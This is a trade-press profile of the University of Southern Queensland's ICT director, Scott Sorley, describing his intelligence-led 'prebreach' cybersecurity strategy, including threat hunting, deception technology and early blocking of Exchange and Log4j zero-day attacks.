University of Southern Queensland
Name: Scott SorleyTitle: Executive director ICT servicesCompany: University of Southern QueenslandCommenced role: October 2010Reporting line: Deputy vice chancellor (Enterprise Services)Member of the executive team: Member of senior leadership groupTechnology Function: 120 staff, 5 direct reports
The cyber investment approach at the University of Southern Queensland resembles the “Precrime” division in the movie “Minority Report” – intercepting criminal activity just before it occurs, according to executive director ICT services, Scott Sorley.
A “prebreach” approach
“Our ‘prebreach’ approach deploys resources using high probability, evidence-based intelligence, predicting and focussing on where a breach attempt is imminent,” Sorley tells CIO Australia.
This contrasts with non-contextual compliance-based or theoretically based risk approaches, he says.
The university advances cybersecurity practices like “threat intelligence” and “threat hunting” with verified evidence, and uses closed-loop continuous processes – tight OODA (observe, orient, decide, act) loops – that significantly increase their impact and utility, says Sorley.
This “prebreach” approach protects four commonly exploited attack surfaces – the organisational network or digital perimeter, applications, identities and internal systems.
“We monitor networks where hackers operate, scrutinising accesses from these locations through algorithms that detect ‘risky’ behaviour,” says Sorley.
“We track new application vulnerabilities before they become public and implement compensating mitigating controls while waiting for patches.”
Sorley’s team also gathers stolen identities and session information from marketplaces hackers use to trade access, and uses honeypot like deception technology to detect high-risk behaviour within the organisation. This provides high-fidelity information on inappropriate access attempts or scans, with almost no false positives.
Shift from impact to likelihood
“A fundamental shift from impact to likelihood, in risk terms, constitutes our most significant innovation,” says Sorley.
Traditional risk concepts inadequately apply to cybersecurity, where high likelihood but minimal impact and undetected breaches can rapidly transform into high impact through privilege escalation or lateral movement or contagion, he says.
“Our parallel innovation involves the targeted, coordinated application of fringe technology, redirecting investment from lower value activities and reaping savings and risk avoidance.”
While the university stills perform compliance and risk-based activities, these activities don’t deliver the highest value in protecting the organisation from cyber breaches, says Sorley.
“Innovative intelligence-based cybersecurity enhances compliance and risk approaches, yielding optimal defence while remaining organisationally defensible.”
This ‘prebreach’ approach emerged after evaluating the efficacy of cybersecurity controls, audit feedback and compliance activities, says Sorley.
“It became evident that compliance efforts were a useful baseline but lacked relevance for many contemporary cyber-attacks.”
Meanwhile even though data collection and security event and incident management (SEIM) systems do provide valuable insights for a reactive incident response, this data is historical.
“The cybersecurity landscape demands a proactive, anticipatory approach,” says Sorley.
“Compliance and general protections alone are insufficient in the face of agile and adaptive attackers. To address this, we recognised the need to focus on anticipating attacks, reducing noise, and redirecting our resources towards preventing high likelihood attacks.”
Specific threat intelligence
To achieve this, the organisation turned to better general and specific threat intelligence, refining it until it was able to automate protective or mitigating action directly from the intelligence.
“This has resulted in high fidelity intelligence-informed proactive and predictive cyber security for our perimeter, application, and identity attack surfaces, which has repeatedly saved us from breaches,” says Sorley.
“Through rigorous post-breach analysis of other organisations, we have observed the same attack methods used against us, but our approach effectively mitigated them before we were targeted. “
“Our success demonstrates the value of anticipating and mitigating attacks earlier in their lifecycle, rather than relying solely on historical data and non-contextual advice.”
For examples the university identified and blocked zero-day vulnerabilities in Microsoft Exchange preventing compromise, as attackers has used the same specific locations to launch other unsuccessful attacks before. Log4j zero-day attacks were also intercepted using application firewalls well before they were officially announced.
“Many organisations were unfortunately breached as the patches were poor and vendors took time to declare their use of the library and patch,” says Sorley.
“We modified our compromised account process to identify session cookie reuse from multiple locations and to kill all active sessions on compromised accounts, mitigating the use of ‘stealer’ malware that stealthily steals session cookies bypassing MFA.”
Evading business disruptions
Quantifying the value of this approach is a complex task, says Sorley.
“As a CIO, I can attest to the fact that every month we evade business disruptions and thwart breaches at earlier stages in the attack lifecycle, while utilising comparable or fewer resources than others. These successes serve as a regular tangible reminder of the efficacy of our approach.”
For Sorley taking a long-term view and consistently delivering, has enabled him to see many major projects and strategic initiatives through their entire lifecycle.
“The true measure of success is long-term value, not building a Jenga tower of quick wins,” he says.
“Adopting a long-term view, I remain committed to delivering results that span the lifecycle of strategic initiatives. Having served in my current role for 12 years, I remain committed to learning and working towards sustained lasting excellence.”
Louis van Wyk
Sponsored Links